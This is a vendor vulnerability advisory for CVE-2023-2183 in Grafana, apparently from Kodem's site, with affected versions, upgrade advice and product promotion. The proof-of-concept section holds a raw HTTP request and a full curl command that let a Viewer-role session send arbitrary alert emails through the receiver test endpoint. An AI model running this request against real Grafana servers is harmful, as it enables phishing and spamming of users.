CVE-2023-2183

CVE-2023-2183 is a medium-severity security vulnerability in github.com/grafana/grafana (go), affecting versions < 8.5.26. It is fixed in 8.5.26, 9.2.19, 9.3.15, 9.4.12, 9.5.3.

Summary

Grafana allows an attacker in the Viewer role, send alerts by API Alert - Test. The option is not available from the user panel UI for in the Viewer role.

Reason for the error: The API does not check access to this function and allows it by users with the least rights, for example, the Viewer that does not see this option in the user panel.

This enables malicious users to abuse the functionality by sending multiple alert messages (e-mail, slack, etc…), spamming users, prepare Phishing attack or blocked SMTP server / IP and automatically moved all message to spam folder, add to black list IP.

Details

The logged-in user, in the Viewer role, in the user panel, does not have access to the test option of sending an e-mail alert.

View of the panel for the user in the Viewer role:

Admin role - View panel for admin role:

Admin role - Next step, editing:

Admin role - Additional options:

PoC

HTTP Request by user in role Viewer

POST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1
Host: xxx
Cookie: grafana_session=xxx
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana
accept: application/json, text/plain, */*
content-type: application/json
…

{"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"settings":{"addresses":"<[email protected]>",
"singleEmail":true},"secureSettings":{},"type":"email","name":"test","disableResolveMessage":false}]}],
"alert":{"annotations":{"runbook_url":"http://example.com ","description":"tekst","testowy":"test http://example.com",
"more":"http://example.com "},"labels":{}}}

HTTP Response:

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Expires: -1
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
Date: Wed, 05 Apr 2023 10:43:00 GMT
Content-Length: 471

{"alert":{"annotations":{"__value_string__":"[ metric='foo' labels={instance=bar} value=10 ]","description":"tekst",
"more":"http://example.com","runbook_url":"http://example.com","summary":"Notification test",
"testowy":"testowy http://example.com"},"labels":{"alertname":"TestAlert","instance":"Grafana"}},
"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"name":"test","uid":"ojUhNFL4k","status":"ok"}]}],
"notified_at":"2023-04-05T12:43:00.1430203+02:00"}

Result:

The attacker can send as a template alert or plain/text.

Mitigation

  1. In the SMTP server configuration settings, limit the ability to send multiple e-mails to the same e-mail address per unit of time / threshold.
  2. Check the API for the possibility of accessing this endpoint for other roles than admin

Impact

As I showed above, an enabled user in the lowest role can execute an endpoint API that allows him to send an e-mail as an alert and impersonate its content. If modified accordingly, the recipient may fall victim to a Phishing attack or a targeted attack to block the SMTP server.

From a practical point of view, this means that for each "GrafanaReceiver" e.g.: Slack, E-mail, etc.. You can send any alert message from user with the least privileged.

CURL example, using a user session in the Viewer role:

curl -i -s -k -X $'POST' \
    -H $'Host: localhost:3002' -H $'Content-Length: 386' -H $'sec-ch-ua: \"Not:A-Brand\";v=\"99\", \"Chromium\";v=\"112\"' -H $'accept: application/json, text/plain, */*' -H $'content-type: application/json' -H $'x-grafana-org-id: 1' -H $'sec-ch-ua-mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36' -H $'sec-ch-ua-platform: \"macOS\"' -H $'Origin: http://localhost:3002' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Referer: http://localhost:3002/' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Connection: close' \
    -b $'grafana_session=xxx' \
    --data-binary $'{\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"settings\":{\"addresses\":\"<[email protected]>\",\"singleEmail\":true\x0d\x0a},\"secureSettings\":{},\"type\":\"email\",\"name\":\"test\",\"disableResolveMessage\":false}]}],\"alert\":{\"annotations\":{\"runbook_url\":\"http://example.com\",\"description\":\"tekst\",\"testowy\":\"testowy http://example.com\",\x0d\x0a\"more\":\"http://example.com\"\x0d\x0a},\"labels\":{}}}\x0d\x0a' \
    $'http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test'

CVE-2023-2183 has a CVSS score of 4.1 (Medium). The vector is network-reachable, low privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (8.5.26, 9.2.19, 9.3.15, 9.4.12, 9.5.3); upgrading removes the vulnerable code path.

Affected versions

github.com/grafana/grafana (< 8.5.26) github.com/grafana/grafana (>= 9.0.0, < 9.2.19) github.com/grafana/grafana (>= 9.3.0, < 9.3.15) github.com/grafana/grafana (>= 9.4.0, < 9.4.12) github.com/grafana/grafana (>= 9.5.0, < 9.5.3)

Security releases

github.com/grafana/grafana → 8.5.26 (go) github.com/grafana/grafana → 9.2.19 (go) github.com/grafana/grafana → 9.3.15 (go) github.com/grafana/grafana → 9.4.12 (go) github.com/grafana/grafana → 9.5.3 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade the following packages to resolve this vulnerability:

github.com/grafana/grafana to 8.5.26 or later; github.com/grafana/grafana to 9.2.19 or later; github.com/grafana/grafana to 9.3.15 or later; github.com/grafana/grafana to 9.4.12 or later; github.com/grafana/grafana to 9.5.3 or later

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2023-2183? CVE-2023-2183 is a medium-severity security vulnerability in github.com/grafana/grafana (go), affecting versions < 8.5.26. It is fixed in 8.5.26, 9.2.19, 9.3.15, 9.4.12, 9.5.3.
  2. How severe is CVE-2023-2183? CVE-2023-2183 has a CVSS score of 4.1 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/grafana/grafana are affected by CVE-2023-2183? github.com/grafana/grafana (go) versions < 8.5.26 is affected.
  4. Is there a fix for CVE-2023-2183? Yes. CVE-2023-2183 is fixed in 8.5.26, 9.2.19, 9.3.15, 9.4.12, 9.5.3. Upgrade to this version or later.
  5. Is CVE-2023-2183 exploitable, and should I be worried? Whether CVE-2023-2183 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2023-2183 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2023-2183?
    • Upgrade github.com/grafana/grafana to 8.5.26 or later
    • Upgrade github.com/grafana/grafana to 9.2.19 or later
    • Upgrade github.com/grafana/grafana to 9.3.15 or later
    • Upgrade github.com/grafana/grafana to 9.4.12 or later
    • Upgrade github.com/grafana/grafana to 9.5.3 or later

Other vulnerabilities in github.com/grafana/grafana

CVE-2026-33381CVE-2026-33380CVE-2026-27877CVE-2026-21724CVE-2025-41117

Stop the waste.
Protect your environment with Kodem.